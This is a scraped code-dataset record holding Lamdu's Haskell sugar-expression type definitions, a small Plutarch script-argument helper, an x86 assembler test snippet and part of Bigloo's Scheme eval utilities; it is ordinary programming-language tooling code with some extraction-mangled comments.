-- When tag suffixes are created by the name pass this is populated,
-- should be given back in the query.
-- TODO: More elegant solution?
} deriving stock Generic
data HoleOpt v name i o k
= HoleBinder (Binder v name i o k)
| HoleVarsRecord [name] -- List of fields
deriving stock Generic
data Else v name i o f
= SimpleElse (Term v name i o f)
| ElseIf (ElseIfBody v name i o f)
deriving Generic
data ElseIfBody v name i o k = ElseIfBody
{ _eAddLet :: o EntityId
-- The inner if-expression that turned into an else-if,
-- was a possible binder for let-items.
-- The user should be able to add let-items in there (and turn it into a normal else).
, _eIfElse :: IfElse v name i o k
} deriving Generic
data IfElse v name i o k = IfElse
{ _iIf :: k :# Term v name i o
, _iThen :: k :# Term v name i o
, _iElse :: k :# Else v name i o
} deriving Generic
data CompositeTail v name i o k
= OpenCompositeTail (k :# Term v name i o)
| ClosedCompositeTail (ClosedCompositeActions o)
deriving Generic
data Composite v name i o k = Composite
{ _cList :: TaggedList name i o (k :# Term v name i o)
Punned items are like 's NamedFieldPuns
_cPunnedItems :: [PunnedVar name o k]
, _cTail :: CompositeTail v name i o k
} deriving Generic
data Nominal v name i o k = Nominal
{ _nTId :: TId name
, _nVal :: k :# Binder v name i o
} deriving Generic
data PostfixFunc v name i o k
= PfCase (Composite v name i o k)
| PfFromNom (TId name)
| PfGetField (TagRef name i o)
deriving Generic
data Leaf name i o
= LeafLiteral (Literal (Property o))
| LeafHole (Hole name i o)
| LeafGetVar (GetVar name o)
| LeafInject (TagRef name i o)
deriving Generic
data Term v name i o k
= BodyLam (Lambda v name i o k)
| BodySimpleApply (App (Term v name i o) k)
-- ^ A simple function application (aka function call): <function> <argument>
| BodyPostfixApply (PostfixApply v name i o k)
-- ^ A function application presented with postfix layout: <argument> .<function>
-- (used for pattern matching, record field access and nominal type unwrapping)
| BodyPostfixFunc (PostfixFunc v name i o k)
-- ^ A function for which postfix application layout apply.
| BodyLabeledApply (LabeledApply v name i o k)
-- ^ A syntax sugar for function application with a record argument
| BodyRecord (Composite v name i o k)
| BodyIfElse (IfElse v name i o k)
| BodyToNom (Nominal v name i o k)
-- ^ Wrap a value with a nominal type constructor
| BodyNullaryInject (NullaryInject name i o k)
-- ^ A variant value with no content
| BodyFragment (Fragment v name i o k)
-- ^ A fragment holds an unfinished term in the code.
-- Often generated when the inner term's type mismatches the expected type
-- at the fragment.
-- Also used as a placeholder for parentheses during typing.
| BodyLeaf (Leaf name i o)
deriving Generic
data Let v name i o k = Let
{ _lValue :: k :# Assignment v name i o -- "let foo = [[bar]] in x"
, _lNames :: LhsNames name i o v -- let [[foo]] = bar in x
, _lBody :: k :# Binder v name i o -- "let foo = bar in [[x]]"
} deriving Generic
-- An expression with 0 or more let items,
-- Appear in a:
-- * Function: "\x -> [[THIS]]"
-- * ToNom: "«X [[THIS]]"
-- * Definition or let item value: "x = [[THIS]]"
-- * Let-item/redex: "let x = y in [[THIS]]"
data Binder v name i o k = Binder
{ _bAddOuterLet :: o EntityId
, _bBody :: BinderBody v name i o k
} deriving Generic
data BinderBody v name i o k
= BinderLet (Let v name i o k)
| BinderTerm (Term v name i o k)
deriving Generic
data Function v name i o k = Function
{ _fChosenScopeProp :: i (Property o (Maybe BinderParamScopeId))
, _fParams :: LhsNames name i o v
, _fBody :: k :# Binder v name i o
, -- The scope inside a lambda
_fBodyScopes :: ParamScopes
} deriving Generic
data AssignPlain v name i o f = AssignPlain
{ _apAddFirstParam :: o EntityId
, _apBody :: Binder v name i o f
} deriving Generic
data Assignment v name i o f
= BodyFunction (Function v name i o f)
| BodyPlain (AssignPlain v name i o f)
deriving Generic
traverse Lens.makeLenses
[ ''AnnotatedArg, ''AssignPlain, ''Binder
, ''Composite, ''Fragment, ''FragOperator
, ''Function, ''Hole
, ''IfElse, ''ElseIfBody, ''LabeledApply, ''Lambda, ''Let
, ''Nominal, ''OperatorArgs, ''PostfixApply
] <&> concat
traverse Lens.makePrisms
[''Assignment, ''BinderBody, ''CompositeTail, ''Else
, ''FragOpt, ''HoleOpt, ''Leaf, ''PostfixFunc, ''Term
] <&> concat
traverse makeHTraversableAndBases
[ ''AnnotatedArg, ''Assignment, ''AssignPlain, ''Binder, ''BinderBody
, ''Composite, ''CompositeTail, ''Else, ''ElseIfBody
, ''Fragment, ''FragOperator, ''FragOpt, ''Function, ''HoleOpt, ''IfElse
, ''LabeledApply, ''Lambda, ''Let, ''Nominal
, ''OperatorArgs, ''PostfixApply, ''PostfixFunc, ''Term
] <&> concat
traverse makeHMorph
[ ''Composite, ''FragOperator, ''IfElse, ''LabeledApply, ''Let, ''OperatorArgs, ''PostfixApply, ''PostfixFunc
] <&> concat
TODO : Replace boilerplate below with TH
instance RNodes (Assignment v name i o)
instance RNodes (Binder v name i o)
instance RNodes (Else v name i o)
instance RNodes (Function v name i o)
instance RNodes (FragOpt v name i o)
instance RNodes (HoleOpt v name i o)
instance RNodes (PostfixFunc v name i o)
instance RNodes (Term v name i o)
type Dep v (c :: HyperType -> Constraint) name i o =
( c (Assignment v name i o)
, c (Binder v name i o)
, c (Const (GetVar name o))
, c (Const (i (TagChoice name o)))
, c (Const (TagRef name i o))
, c (Else v name i o)
, c (PostfixFunc v name i o)
, c (Term v name i o)
)
instance Dep v c name i o => Recursively c (Assignment v name i o)
instance Dep v c name i o => Recursively c (Binder v name i o)
instance Dep v c name i o => Recursively c (Else v name i o)
instance Dep v c name i o => Recursively c (PostfixFunc v name i o)
instance Dep v c name i o => Recursively c (Term v name i o)
instance (Dep v c name i o, c (HoleOpt v name i o)) => Recursively c (HoleOpt v name i o)
instance (Dep v c name i o, c (FragOpt v name i o)) => Recursively c (FragOpt v name i o)
instance (Dep v c name i o, c (Function v name i o)) => Recursively c (Function v name i o)
instance RTraversable (Assignment v name i o)
instance RTraversable (Binder v name i o)
instance RTraversable (Else v name i o)
instance RTraversable (PostfixFunc v name i o)
instance RTraversable (Term v name i o)
| null | https://raw.githubusercontent.com/lamdu/lamdu/2ff69bf3abfa1f2d512265919210176cda94e48e/src/Lamdu/Sugar/Types/Expression.hs | haskell | Binders
Holes
Fragments
If/else
Record & Cases
Returns whether fragment were added or removed
TODO: func + specialArgs into a single sum type so that field order
| An expression marked for transformation.
Holds an expression to be transformed but acts like a hole.
An option to apply (with a hole).
See comment for holeTagSuffixes
a single option can suggest chaining of multiple post-fix applications
Apply fragmented expr with argument
(usually a hole, but may be completed to other values)
Name walk requires monadic place to process names.
Hole can prepare results depending on the query and avoid doing work
if the query filters it out.
When tag suffixes are created by the name pass this is populated,
should be given back in the query.
TODO: More elegant solution?
List of fields
The inner if-expression that turned into an else-if,
was a possible binder for let-items.
The user should be able to add let-items in there (and turn it into a normal else).
^ A simple function application (aka function call): <function> <argument>
^ A function application presented with postfix layout: <argument> .<function>
(used for pattern matching, record field access and nominal type unwrapping)
^ A function for which postfix application layout apply.
^ A syntax sugar for function application with a record argument
^ Wrap a value with a nominal type constructor
^ A variant value with no content
^ A fragment holds an unfinished term in the code.
Often generated when the inner term's type mismatches the expected type
at the fragment.
Also used as a placeholder for parentheses during typing.
"let foo = [[bar]] in x"
let [[foo]] = bar in x
"let foo = bar in [[x]]"
An expression with 0 or more let items,
Appear in a:
* Function: "\x -> [[THIS]]"
* ToNom: "«X [[THIS]]"
* Definition or let item value: "x = [[THIS]]"
* Let-item/redex: "let x = y in [[THIS]]"
The scope inside a lambda | # LANGUAGE TemplateHaskell , TypeFamilies , MultiParamTypeClasses , UndecidableInstances , DataKinds , GADTs , ConstraintKinds , FlexibleInstances #
module Lamdu.Sugar.Types.Expression
( Expr, Body
, Term(..)
, _BodyLam, _BodyLabeledApply, _BodySimpleApply
, _BodyRecord, _BodyFragment, _BodyLeaf, _BodyNullaryInject
, _BodyToNom, _BodyIfElse, _BodyPostfixApply, _BodyPostfixFunc
, Leaf(..), _LeafLiteral, _LeafHole, _LeafGetVar, _LeafInject
, AnnotatedArg(..), aaTag, aaExpr
, OperatorArgs(..), oaLhs, oaRhs, oaSwapArguments
, LabeledApply(..), aFunc, aMOpArgs, aAnnotatedArgs, aPunnedArgs
, PostfixApply(..), pArg, pFunc
, PostfixFunc(..), _PfCase, _PfFromNom, _PfGetField
, App(..), appFunc, appArg
, Lambda(..), lamFunc, lamLightweight, lamApplyLimit
, Nominal(..), nTId, nVal
, Let(..), lValue, lNames, lBody
, Meta.DefinitionState(..)
, BinderParamScopeId(..), bParamScopeId
, Binder(..), bBody, bAddOuterLet
, BinderBody(..), _BinderLet, _BinderTerm
, Function(..), fChosenScopeProp, fParams, fBody, fBodyScopes
, AssignPlain(..), apAddFirstParam, apBody
, Assignment(..), _BodyFunction, _BodyPlain
, Hole(..), holeOptions, holeTagSuffixes
, HoleOpt(..), _HoleBinder, _HoleVarsRecord
, Query(..), qLangInfo, qSearchTerm
, QueryLangInfo(..), qLangId, qLangDir, qCodeTexts, qUITexts, qNameTexts
, hasQueryLangInfo
, Fragment(..), fExpr, fHeal, fTypeMismatch, fOptions, fOptApply, fTagSuffixes
, FragOpt(..), _FragPostfix, _FragInject, _FragApplyFunc, _FragOp
, FragOperator(..), oFunc, oRightArg, oAnnotatedArgs
, IfElse(..), iIf, iThen, iElse
, Else(..), _SimpleElse, _ElseIf
, ElseIfBody(..), eAddLet, eIfElse
, Composite(..), cList, cPunnedItems, cTail
, CompositeTail(..), _OpenCompositeTail, _ClosedCompositeTail
, PunnedVar(..), pvVar, pvTagEntityId
, MorphWitness(..)
) where
import qualified Control.Lens as Lens
import Data.Property (Property)
import Data.Kind (Type)
import Hyper
import Hyper.Syntax (App(..), appFunc, appArg)
import Lamdu.Data.Anchors (BinderParamScopeId(..), bParamScopeId)
import qualified Lamdu.Data.Meta as Meta
import Lamdu.Sugar.Internal.EntityId (EntityId)
import Lamdu.Sugar.Types.Eval (ParamScopes)
import Lamdu.Sugar.Types.GetVar (GetVar)
import Lamdu.Sugar.Types.Lhs (LhsNames)
import Lamdu.Sugar.Types.Parts
import Lamdu.Sugar.Types.Tag
import Lamdu.Sugar.Types.TaggedList (TaggedList)
import Lamdu.Sugar.Types.Type (TId)
import qualified Lamdu.Sugar.Types.Type as T
import Lamdu.Prelude
type Body e v name (i :: Type -> Type) o = e v name i o # Annotated (Payload v o)
data AnnotatedArg v name i o k = AnnotatedArg
{ _aaTag :: Tag name
, _aaExpr :: k :# Term v name i o
} deriving Generic
data OperatorArgs v name i o k = OperatorArgs
{ _oaLhs :: k :# Term v name i o
, _oaRhs :: k :# Term v name i o
} deriving Generic
matches order , no need for special traversal code
data LabeledApply v name i o k = LabeledApply
{ _aFunc :: k :# Const (GetVar name o)
, _aMOpArgs :: Maybe (OperatorArgs v name i o k)
, _aAnnotatedArgs :: [AnnotatedArg v name i o k]
, _aPunnedArgs :: [PunnedVar name o k]
} deriving Generic
data PostfixApply v name i o k = PostfixApply
{ _pArg :: k :# Term v name i o
, _pFunc :: k :# PostfixFunc v name i o
} deriving Generic
data Lambda v name i o f = Lambda
{ _lamLightweight :: Bool
, _lamApplyLimit :: FuncApplyLimit
, _lamFunc :: Function v name i o f
} deriving Generic
data Fragment v name i o k = Fragment
{ _fExpr :: k :# Term v name i o
, _fHeal :: o EntityId
, _fTypeMismatch :: Maybe (Annotated EntityId # T.Type name)
, _fOptions :: i (Query -> i [Option FragOpt name i o])
, _fOptApply :: i (Option FragOpt name i o)
Used for the actions to turn this hole into literal ( i.e pressing " 5 " )
} deriving Generic
data FragOpt v name i o k
| FragInject (TagRef name i o)
| FragWrapInRec (TagRef name i o)
| FragApplyFunc (GetVar name o)
| FragOp (FragOperator v name i o k)
| FragToNom (TId name)
| FragLam
| FragDefer
| FragIf (k :# Term v name i o)
deriving Generic
data FragOperator v name i o k = FragOperator
{ _oFunc :: k :# Const (GetVar name o)
Argument on right - hand - side ( LTR ) of operator .
_oRightArg :: k :# Term v name i o
, _oAnnotatedArgs :: [Tag name]
} deriving Generic
data Hole name i o = Hole
{ _holeOptions ::
i (Query -> i [Option HoleOpt name i o])
Inner ` i ` serves two purposes :
, _holeTagSuffixes :: TagSuffixes
} deriving stock Generic
data HoleOpt v name i o k
= HoleBinder (Binder v name i o k)
deriving stock Generic
data Else v name i o f
= SimpleElse (Term v name i o f)
| ElseIf (ElseIfBody v name i o f)
deriving Generic
data ElseIfBody v name i o k = ElseIfBody
{ _eAddLet :: o EntityId
, _eIfElse :: IfElse v name i o k
} deriving Generic
data IfElse v name i o k = IfElse
{ _iIf :: k :# Term v name i o
, _iThen :: k :# Term v name i o
, _iElse :: k :# Else v name i o
} deriving Generic
data CompositeTail v name i o k
= OpenCompositeTail (k :# Term v name i o)
| ClosedCompositeTail (ClosedCompositeActions o)
deriving Generic
data Composite v name i o k = Composite
{ _cList :: TaggedList name i o (k :# Term v name i o)
Punned items are like 's NamedFieldPuns
_cPunnedItems :: [PunnedVar name o k]
, _cTail :: CompositeTail v name i o k
} deriving Generic
data Nominal v name i o k = Nominal
{ _nTId :: TId name
, _nVal :: k :# Binder v name i o
} deriving Generic
data PostfixFunc v name i o k
= PfCase (Composite v name i o k)
| PfFromNom (TId name)
| PfGetField (TagRef name i o)
deriving Generic
data Leaf name i o
= LeafLiteral (Literal (Property o))
| LeafHole (Hole name i o)
| LeafGetVar (GetVar name o)
| LeafInject (TagRef name i o)
deriving Generic
data Term v name i o k
= BodyLam (Lambda v name i o k)
| BodySimpleApply (App (Term v name i o) k)
| BodyPostfixApply (PostfixApply v name i o k)
| BodyPostfixFunc (PostfixFunc v name i o k)
| BodyLabeledApply (LabeledApply v name i o k)
| BodyRecord (Composite v name i o k)
| BodyIfElse (IfElse v name i o k)
| BodyToNom (Nominal v name i o k)
| BodyNullaryInject (NullaryInject name i o k)
| BodyFragment (Fragment v name i o k)
| BodyLeaf (Leaf name i o)
deriving Generic
data Let v name i o k = Let
} deriving Generic
data Binder v name i o k = Binder
{ _bAddOuterLet :: o EntityId
, _bBody :: BinderBody v name i o k
} deriving Generic
data BinderBody v name i o k
= BinderLet (Let v name i o k)
| BinderTerm (Term v name i o k)
deriving Generic
data Function v name i o k = Function
{ _fChosenScopeProp :: i (Property o (Maybe BinderParamScopeId))
, _fParams :: LhsNames name i o v
, _fBody :: k :# Binder v name i o
_fBodyScopes :: ParamScopes
} deriving Generic
data AssignPlain v name i o f = AssignPlain
{ _apAddFirstParam :: o EntityId
, _apBody :: Binder v name i o f
} deriving Generic
data Assignment v name i o f
= BodyFunction (Function v name i o f)
| BodyPlain (AssignPlain v name i o f)
deriving Generic
traverse Lens.makeLenses
[ ''AnnotatedArg, ''AssignPlain, ''Binder
, ''Composite, ''Fragment, ''FragOperator
, ''Function, ''Hole
, ''IfElse, ''ElseIfBody, ''LabeledApply, ''Lambda, ''Let
, ''Nominal, ''OperatorArgs, ''PostfixApply
] <&> concat
traverse Lens.makePrisms
[''Assignment, ''BinderBody, ''CompositeTail, ''Else
, ''FragOpt, ''HoleOpt, ''Leaf, ''PostfixFunc, ''Term
] <&> concat
traverse makeHTraversableAndBases
[ ''AnnotatedArg, ''Assignment, ''AssignPlain, ''Binder, ''BinderBody
, ''Composite, ''CompositeTail, ''Else, ''ElseIfBody
, ''Fragment, ''FragOperator, ''FragOpt, ''Function, ''HoleOpt, ''IfElse
, ''LabeledApply, ''Lambda, ''Let, ''Nominal
, ''OperatorArgs, ''PostfixApply, ''PostfixFunc, ''Term
] <&> concat
traverse makeHMorph
[ ''Composite, ''FragOperator, ''IfElse, ''LabeledApply, ''Let, ''OperatorArgs, ''PostfixApply, ''PostfixFunc
] <&> concat
TODO : Replace boilerplate below with TH
instance RNodes (Assignment v name i o)
instance RNodes (Binder v name i o)
instance RNodes (Else v name i o)
instance RNodes (Function v name i o)
instance RNodes (FragOpt v name i o)
instance RNodes (HoleOpt v name i o)
instance RNodes (PostfixFunc v name i o)
instance RNodes (Term v name i o)
type Dep v (c :: HyperType -> Constraint) name i o =
( c (Assignment v name i o)
, c (Binder v name i o)
, c (Const (GetVar name o))
, c (Const (i (TagChoice name o)))
, c (Const (TagRef name i o))
, c (Else v name i o)
, c (PostfixFunc v name i o)
, c (Term v name i o)
)
instance Dep v c name i o => Recursively c (Assignment v name i o)
instance Dep v c name i o => Recursively c (Binder v name i o)
instance Dep v c name i o => Recursively c (Else v name i o)
instance Dep v c name i o => Recursively c (PostfixFunc v name i o)
instance Dep v c name i o => Recursively c (Term v name i o)
instance (Dep v c name i o, c (HoleOpt v name i o)) => Recursively c (HoleOpt v name i o)
instance (Dep v c name i o, c (FragOpt v name i o)) => Recursively c (FragOpt v name i o)
instance (Dep v c name i o, c (Function v name i o)) => Recursively c (Function v name i o)
instance RTraversable (Assignment v name i o)
instance RTraversable (Binder v name i o)
instance RTraversable (Else v name i o)
instance RTraversable (PostfixFunc v name i o)
instance RTraversable (Term v name i o)
|
f3ece0b3e318014873096550b3a6b1036eb56ecfbcd5792f2d9cef2be4c457a7 | Liqwid-Labs/liqwid-plutarch-extra | Script.hs | module Plutarch.Extra.Script (applyArguments) where
import Control.Lens (over)
import Plutarch.Script (Script (Script))
import PlutusCore.Data qualified as PLC
import PlutusCore.MkPlc qualified as PLC
import UntypedPlutusCore qualified as UPLC
| Applys ' Data ' to Script
@since 3.20.0
@since 3.20.0
-}
applyArguments :: Script -> [PLC.Data] -> Script
applyArguments (Script p) args =
let termArgs = fmap (PLC.mkConstant ()) args
applied t = PLC.mkIterApp () t termArgs
in Script $ over UPLC.progTerm applied p
| null | https://raw.githubusercontent.com/Liqwid-Labs/liqwid-plutarch-extra/79604ece6d24c1e5d6e11c02e88f9e7907a19399/src/Plutarch/Extra/Script.hs | haskell | module Plutarch.Extra.Script (applyArguments) where
import Control.Lens (over)
import Plutarch.Script (Script (Script))
import PlutusCore.Data qualified as PLC
import PlutusCore.MkPlc qualified as PLC
import UntypedPlutusCore qualified as UPLC
| Applys ' Data ' to Script
@since 3.20.0
@since 3.20.0
-}
applyArguments :: Script -> [PLC.Data] -> Script
applyArguments (Script p) args =
let termArgs = fmap (PLC.mkConstant ()) args
applied t = PLC.mkIterApp () t termArgs
in Script $ over UPLC.progTerm applied p
| |
88b665032ef8faea022db02bb4fbe063f5c75a228c5ecbe7fe197e0c7c54920a | larcenists/larceny | 16with-win3.scm | (bits 16)
(text
(label foo (ret))
(label bar (ret))
(if (while (!= ax 3)
(seq (pop ax)
(inc ax)
(< ax 10)))
(with-win bar
(alt z! a!))
(with-win foo
(push bx))))
00000000 C3 ret
00000001 C3 ret
00000002 EB07 short 0xb
00000004 58 pop ax
00000005 40 inc ax
; 00000006 3D0A00 cmp ax,0xa
00000009 7D0E jnl 0x19
0000000B 3D0300 cmp ax,0x3
0000000E 75F4 jnz 0x4
00000010 0F84EDFF jz near 0x1
00000014 7607 jna 0x1d
00000016 E9E8FF jmp 0x1
00000019 53 push bx
0000001A E9E3FF jmp 0x0
| null | https://raw.githubusercontent.com/larcenists/larceny/fef550c7d3923deb7a5a1ccd5a628e54cf231c75/src/Lib/Sassy/tests/prims16/16with-win3.scm | scheme | 00000006 3D0A00 cmp ax,0xa | (bits 16)
(text
(label foo (ret))
(label bar (ret))
(if (while (!= ax 3)
(seq (pop ax)
(inc ax)
(< ax 10)))
(with-win bar
(alt z! a!))
(with-win foo
(push bx))))
00000000 C3 ret
00000001 C3 ret
00000002 EB07 short 0xb
00000004 58 pop ax
00000005 40 inc ax
00000009 7D0E jnl 0x19
0000000B 3D0300 cmp ax,0x3
0000000E 75F4 jnz 0x4
00000010 0F84EDFF jz near 0x1
00000014 7607 jna 0x1d
00000016 E9E8FF jmp 0x1
00000019 53 push bx
0000001A E9E3FF jmp 0x0
|
a777275a0c07edf0aab17aba0282c4be62a9a62ca0a094d87174cb3714a880d1 | Hendekagon/clique | core.clj | (ns clique.core
"
Function dependency graph generation
"
(:require
[clojure.tools.namespace.find :as nsf]
[clojure.java.io :as io]
[loom [graph :as lg]
[attr :as la]
[io :as lio]]))
(defn get-namespace-forms [filename]
(let [read-params {:eof nil}]
(with-open [r (java.io.PushbackReader. (io/reader filename))]
(binding [*read-eval* false]
(loop [forms [] form (read read-params r)]
(if form
(recur (conj forms form) (read read-params r))
forms))))))
(defn get-ns-defs
([filename]
(get-ns-defs {} filename))
([params file]
(get-ns-defs params file (get-namespace-forms file)))
([{include-defs :include-defs :or {include-defs #{'defn 'defmacro}}}
file [[_ ns-name :as ns-dec] & forms :as nsf]]
(if (try (do (require ns-name) true) (catch Exception e false))
(sequence
(comp
(filter (comp include-defs first))
(map (fn [form] (with-meta form {:ns-name ns-name}))))
forms)
'())))
(defn fqsym
"Returns the fully qualified symbol s in namespace ns"
([ns s]
(fqsym (meta (ns-resolve ns s))))
([{ans :ns sym :name :as m}]
(if m
(with-meta (symbol (str ans) (name sym)) m)
nil)))
(defn get-deps
"Return the dependencies of the function or macro
defined by a-def"
[{:keys [ignore] :or {ignore #{}}} a-def]
(let [{ns-name :ns-name :as m} (meta a-def)
syms (filter symbol? (tree-seq seqable? seq a-def))
[deff fq-name & that] (remove nil? (map (partial fqsym ns-name) syms))
]
(assoc m
:depends-on (sequence (comp (filter (comp seq :arglists meta)) (remove (comp ignore namespace)) (remove (into #{} syms))) that)
:fq-name fq-name
:kind (if (= "defmacro" (name deff)) :macro :function))))
(defn as-graph
"Return the given dependencies as a graph"
[deps]
(apply lg/digraph
(mapcat
(fn [{:keys [depends-on fq-name ns-name]}]
(map (fn [d] [fq-name d]) depends-on)) deps)))
(defn project-dependencies
"Returns a dependency graph of functions
found in all namespaces from path"
([path]
(project-dependencies
{:ignore #{"clojure.core"}} path))
([{:keys [ignore] :as params} path]
(->>
(io/file path)
(nsf/find-sources-in-dir)
(mapcat (partial get-ns-defs params))
(map (partial get-deps params)))))
(def default-params
{:graphviz
{:fmt :pdf :alg :dot
:graph {:ratio 0.618}
:node {:shape :record :fontsize 10}}
:ignore #{"clojure.core"}
:include-defs #{'defn 'defmacro}})
(defn view-deps
([]
(view-deps default-params "."))
([{view-opts :graphviz :as params} path]
(-> path
((partial project-dependencies params))
as-graph
((partial apply lio/view) (mapcat identity view-opts)))))
(defn run [{path :path :as params}]
(do
(view-deps (merge default-params params) (str (or path ".")))
(Thread/sleep 1000)
(System/exit 0)))
(comment
(view-deps)
) | null | https://raw.githubusercontent.com/Hendekagon/clique/29859d561e27d4e6b9444798f385a7840a259a52/src/clj/clique/core.clj | clojure | (ns clique.core
"
Function dependency graph generation
"
(:require
[clojure.tools.namespace.find :as nsf]
[clojure.java.io :as io]
[loom [graph :as lg]
[attr :as la]
[io :as lio]]))
(defn get-namespace-forms [filename]
(let [read-params {:eof nil}]
(with-open [r (java.io.PushbackReader. (io/reader filename))]
(binding [*read-eval* false]
(loop [forms [] form (read read-params r)]
(if form
(recur (conj forms form) (read read-params r))
forms))))))
(defn get-ns-defs
([filename]
(get-ns-defs {} filename))
([params file]
(get-ns-defs params file (get-namespace-forms file)))
([{include-defs :include-defs :or {include-defs #{'defn 'defmacro}}}
file [[_ ns-name :as ns-dec] & forms :as nsf]]
(if (try (do (require ns-name) true) (catch Exception e false))
(sequence
(comp
(filter (comp include-defs first))
(map (fn [form] (with-meta form {:ns-name ns-name}))))
forms)
'())))
(defn fqsym
"Returns the fully qualified symbol s in namespace ns"
([ns s]
(fqsym (meta (ns-resolve ns s))))
([{ans :ns sym :name :as m}]
(if m
(with-meta (symbol (str ans) (name sym)) m)
nil)))
(defn get-deps
"Return the dependencies of the function or macro
defined by a-def"
[{:keys [ignore] :or {ignore #{}}} a-def]
(let [{ns-name :ns-name :as m} (meta a-def)
syms (filter symbol? (tree-seq seqable? seq a-def))
[deff fq-name & that] (remove nil? (map (partial fqsym ns-name) syms))
]
(assoc m
:depends-on (sequence (comp (filter (comp seq :arglists meta)) (remove (comp ignore namespace)) (remove (into #{} syms))) that)
:fq-name fq-name
:kind (if (= "defmacro" (name deff)) :macro :function))))
(defn as-graph
"Return the given dependencies as a graph"
[deps]
(apply lg/digraph
(mapcat
(fn [{:keys [depends-on fq-name ns-name]}]
(map (fn [d] [fq-name d]) depends-on)) deps)))
(defn project-dependencies
"Returns a dependency graph of functions
found in all namespaces from path"
([path]
(project-dependencies
{:ignore #{"clojure.core"}} path))
([{:keys [ignore] :as params} path]
(->>
(io/file path)
(nsf/find-sources-in-dir)
(mapcat (partial get-ns-defs params))
(map (partial get-deps params)))))
(def default-params
{:graphviz
{:fmt :pdf :alg :dot
:graph {:ratio 0.618}
:node {:shape :record :fontsize 10}}
:ignore #{"clojure.core"}
:include-defs #{'defn 'defmacro}})
(defn view-deps
([]
(view-deps default-params "."))
([{view-opts :graphviz :as params} path]
(-> path
((partial project-dependencies params))
as-graph
((partial apply lio/view) (mapcat identity view-opts)))))
(defn run [{path :path :as params}]
(do
(view-deps (merge default-params params) (str (or path ".")))
(Thread/sleep 1000)
(System/exit 0)))
(comment
(view-deps)
) | |
fc3a775c9a82203286024b35e0dd665c9e4abedf8f2f96c70e474bc1777138c4 | donaldsonjw/bigloo | evutils.scm | ;*=====================================================================*/
* serrano / prgm / project / bigloo / runtime / Eval / evutils.scm * /
;* ------------------------------------------------------------- */
* Author : * /
* Creation : Fri Jul 30 08:07:53 2010 * /
* Last change : Sat Sep 7 09:28:41 2013 ( serrano ) * /
* Copyright : 2010 - 13 * /
;* ------------------------------------------------------------- */
;* Utility functions for eval */
;*=====================================================================*/
;*---------------------------------------------------------------------*/
;* The module */
;*---------------------------------------------------------------------*/
(module __evutils
(import __type
__error
__bigloo
__tvector
__structure
__tvector
__bexit
__bignum
__os
__param
__object
__thread
__dsssl
__r4_numbers_6_5
__r4_numbers_6_5_fixnum
__r4_numbers_6_5_flonum
__r4_numbers_6_5_flonum_dtoa
__r4_characters_6_6
__r4_equivalence_6_2
__r4_booleans_6_1
__r4_symbols_6_4
__r4_strings_6_7
__r4_pairs_and_lists_6_3
__r4_control_features_6_9
__r4_vectors_6_8
__r4_ports_6_10_1
__r4_output_6_10_3
__evenv
__macro)
(export (parse-formal-ident ::obj ::obj)
(args->list ::obj)
(bindings->list ::obj)))
;*---------------------------------------------------------------------*/
;* parse-formal-ident ... */
;*---------------------------------------------------------------------*/
(define (parse-formal-ident ident loc)
(define (parse-typed-ident ident)
(let* ((str (symbol->string! ident))
(len (string-length str)))
(let loop ((i 0))
(cond
((=fx i len)
(cons ident '()))
((and (char=? (string-ref str i) #\:)
(<fx i (-fx len 1))
(char=? (string-ref str (+fx i 1)) #\:))
(cond
((=fx i (-fx len 2))
(error/source-location "parse-formal-ident"
"Illegal empty identifier type"
ident
loc))
((=fx i 0)
(cons (string->symbol "") ident))
(else
(cons (string->symbol (substring str 0 i))
(string->symbol (substring str (+fx i 2) len))))))
(else
(loop (+fx i 1)))))))
(cond
((dsssl-named-constant? ident)
(cons (gensym 'dsssl) '()))
((and (pair? ident) (symbol? (car ident)))
(cons ident '()))
((not (symbol? ident))
(error/source-location "parse-formal-ident"
"Illegal identifier type"
ident
loc))
(else
(parse-typed-ident ident))))
;*---------------------------------------------------------------------*/
;* args->list ... */
;*---------------------------------------------------------------------*/
(define (args->list args)
(cond
((null? args)
'())
((symbol? args)
(list args))
((pair? args)
(cons (car args) (args->list (cdr args))))
(else
(error/source 'args->list "Illegal args list" args args))))
;*---------------------------------------------------------------------*/
;* bindings->list ... */
;*---------------------------------------------------------------------*/
(define (bindings->list bindings)
(cond
((null? bindings)
'())
((not (pair? bindings))
(error/source 'bindings->list "Illegal bindings list" bindings bindings))
((symbol? (car bindings))
(cons bindings (bindings->list (cdr bindings))))
((not (pair? (car bindings)))
(error/source 'bindings->list "Illegal bindings list" bindings bindings))
(else
(cons (car bindings) (bindings->list (cdr bindings))))))
| null | https://raw.githubusercontent.com/donaldsonjw/bigloo/a4d06e409d0004e159ce92b9908719510a18aed5/runtime/Eval/evutils.scm | scheme | *=====================================================================*/
* ------------------------------------------------------------- */
* ------------------------------------------------------------- */
* Utility functions for eval */
*=====================================================================*/
*---------------------------------------------------------------------*/
* The module */
*---------------------------------------------------------------------*/
*---------------------------------------------------------------------*/
* parse-formal-ident ... */
*---------------------------------------------------------------------*/
*---------------------------------------------------------------------*/
* args->list ... */
*---------------------------------------------------------------------*/
*---------------------------------------------------------------------*/
* bindings->list ... */
*---------------------------------------------------------------------*/ | * serrano / prgm / project / bigloo / runtime / Eval / evutils.scm * /
* Author : * /
* Creation : Fri Jul 30 08:07:53 2010 * /
* Last change : Sat Sep 7 09:28:41 2013 ( serrano ) * /
* Copyright : 2010 - 13 * /
(module __evutils
(import __type
__error
__bigloo
__tvector
__structure
__tvector
__bexit
__bignum
__os
__param
__object
__thread
__dsssl
__r4_numbers_6_5
__r4_numbers_6_5_fixnum
__r4_numbers_6_5_flonum
__r4_numbers_6_5_flonum_dtoa
__r4_characters_6_6
__r4_equivalence_6_2
__r4_booleans_6_1
__r4_symbols_6_4
__r4_strings_6_7
__r4_pairs_and_lists_6_3
__r4_control_features_6_9
__r4_vectors_6_8
__r4_ports_6_10_1
__r4_output_6_10_3
__evenv
__macro)
(export (parse-formal-ident ::obj ::obj)
(args->list ::obj)
(bindings->list ::obj)))
(define (parse-formal-ident ident loc)
(define (parse-typed-ident ident)
(let* ((str (symbol->string! ident))
(len (string-length str)))
(let loop ((i 0))
(cond
((=fx i len)
(cons ident '()))
((and (char=? (string-ref str i) #\:)
(<fx i (-fx len 1))
(char=? (string-ref str (+fx i 1)) #\:))
(cond
((=fx i (-fx len 2))
(error/source-location "parse-formal-ident"
"Illegal empty identifier type"
ident
loc))
((=fx i 0)
(cons (string->symbol "") ident))
(else
(cons (string->symbol (substring str 0 i))
(string->symbol (substring str (+fx i 2) len))))))
(else
(loop (+fx i 1)))))))
(cond
((dsssl-named-constant? ident)
(cons (gensym 'dsssl) '()))
